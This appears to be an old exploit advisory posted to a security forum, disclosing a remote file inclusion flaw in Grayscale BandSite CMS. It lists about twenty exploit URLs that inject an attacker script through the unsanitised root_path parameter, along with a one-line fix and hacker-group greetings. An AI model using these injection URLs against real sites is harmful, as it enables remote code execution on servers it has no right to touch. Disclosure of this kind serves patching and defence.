[RST] Grayscale BandSite CMS - RFI

[Guest Nemessis]

---------------------------------------------------------------------------

Grayscale BandSite CMS <=([root_path]) Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Grayscale BandSite CMS

version : latest version

URL :http://sourceforge.net/projects/bandsitecms/

------------------------------------------------------------------

Exploit:

~~~~~~~

Variable $root_path not sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil script]

# http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil script]

---------------------------------------------------------------------------

Solution :

~~~~~~~~~

declare variabel $root_path

---------------------------------------------------------------------------

Shoutz:

~~~~~

# Special greetz to my good friend [Oo]

# To all members of h4cky0u.org and Romanian Security Team [ hTTp://rstcenter.com ]

---------------------------------------------------------------------------

*/

[das392]

http://securitydot.net/xpl/exploits/vulnerabilities/articles/1089/exploit.html